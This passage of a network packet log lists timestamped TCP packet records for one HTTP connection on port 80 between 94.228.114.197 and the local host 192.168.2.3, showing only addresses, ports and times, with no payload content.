Jul 22, 2021 11:28:05.034723997 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.034759045 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.034790039 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.034794092 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.034837008 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.034874916 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.034877062 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.034909964 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.034913063 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.034945965 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.034970045 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.034981012 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.035012007 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.035015106 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.035049915 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.035084009 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.035104036 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.035154104 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.035188913 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.035201073 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.035240889 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.035274982 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.035279036 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.035310984 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.035341978 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.035346985 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.035381079 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.035415888 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.035415888 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.035450935 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.035494089 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.035523891 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.035531998 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.035582066 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.035609961 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.035619974 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.035657883 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.035684109 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.035720110 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.035751104 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.035758018 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.035797119 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.035829067 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.035842896 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.035885096 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.035922050 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.035949945 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.035959959 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.035995007 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.035998106 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.036036968 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.036071062 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.036102057 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.036144972 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.036181927 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.036207914 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.036227942 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.036263943 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.036269903 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.036307096 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.036339045 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.036345005 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.036384106 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.036418915 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.036422014 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.036457062 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.036494970 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.036528111 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.036541939 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.036585093 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.036585093 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.036623955 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.036662102 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.036668062 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.036701918 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.036727905 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.036740065 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.036777973 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.036814928 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.036839008 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.036860943 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.036891937 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.036902905 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.036941051 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.036979914 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.037018061 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.037023067 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.037054062 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.037080050 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.037091970 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.037130117 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.037153006 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.037177086 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.037218094 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.037218094 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.037256002 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.037292957 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.037328959 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.037331104 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.037368059 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.037403107 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.037405968 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.037445068 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.037468910 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.037492037 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.037534952 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.037561893 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.037586927 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.037625074 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.037658930 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.037662983 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.037700891 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.037735939 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.037738085 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.037775993 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.037795067 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.037823915 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.037864923 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.037868023 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.037902117 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.037940025 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.037942886 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.037976980 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.038012981 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.038048983 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.038050890 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.038088083 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.038124084 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.038132906 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.038172960 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.038175106 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.038212061 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.038249969 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.038255930 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.038288116 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.038322926 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.038335085 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.038362026 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.038393021 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.038398027 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.038445950 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.038486958 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.038500071 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.038525105 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.038562059 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.038563013 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.038600922 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.038636923 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.038638115 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.038675070 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.038714886 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.038746119 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.038762093 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.038805008 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.038810968 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.038841963 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.038880110 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.038906097 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.038933039 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.038969040 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.038986921 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.039005995 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.039037943 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.039043903 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.039091110 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.039155006 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.039158106 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.039201021 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.039238930 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.039239883 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.039275885 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.039313078 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.039313078 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.039360046 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.039393902 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.039401054 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.039437056 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.039474964 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.039478064 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.039514065 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.039535999 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.041320086 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.119239092 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.119338036 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.119479895 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.119482994 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.119519949 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.119559050 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.119596004 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.119601011 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.119633913 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.119740009 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.119744062 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.119787931 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.119828939 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.119831085 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.119867086 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.119904041 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.119930983 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.119942904 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.119978905 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.120016098 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.120037079 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.120053053 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.120099068 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.120131969 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.120153904 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.120189905 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.120191097 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.120229006 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.120265961 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.120285988 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.120320082 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.120356083 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.120393991 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.120405912 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.120429993 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.120467901 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.120503902 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.120510101 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.120549917 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.120590925 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.120608091 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.120626926 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.120665073 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.120702028 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.120702982 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.120738983 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.120775938 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.120812893 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.120817900 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.120858908 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.120899916 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.120922089 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.120937109 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.120974064 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.121011019 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.121016026 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.121047020 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.121083975 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.121119976 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.121124029 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.121165991 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.121206999 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.121233940 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.121243954 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.121282101 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.121319056 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.121323109 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.121354103 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.121391058 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.121424913 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.121428013 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.121474028 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.121515036 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.121520996 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.121551991 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.121599913 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.121606112 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.121644974 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.121680021 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.121695995 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.121720076 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.121757030 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.121786118 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.121814013 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.121855021 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.121870995 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.121892929 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.121929884 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.121963024 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.121967077 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.122003078 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.122040033 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.122046947 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.122077942 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.122123957 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.122132063 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.122164965 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.122199059 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.122200966 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.122240067 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.122272968 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.122277021 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.122313976 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.122349977 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.122373104 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.122387886 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.122433901 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.122473955 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.122479916 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.122513056 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.122550964 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.122551918 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.122590065 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.122625113 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.122632027 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.122662067 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.122693062 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.122699022 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.122745991 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.122762918 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.122786045 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.122822046 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.122848034 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.122870922 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.122909069 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.122929096 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.122945070 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.122982025 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.123022079 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.123028040 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.123068094 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.123100042 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.123109102 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.123171091 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.123172998 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.123209000 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.123245955 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.123260021 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.123282909 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.123328924 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.123349905 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.123369932 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.123406887 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.123424053 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.123444080 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.123481035 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.123513937 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.123517990 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.123554945 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.123590946 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.123614073 CEST	49720	80	192.168.2.3	94.228.114.197
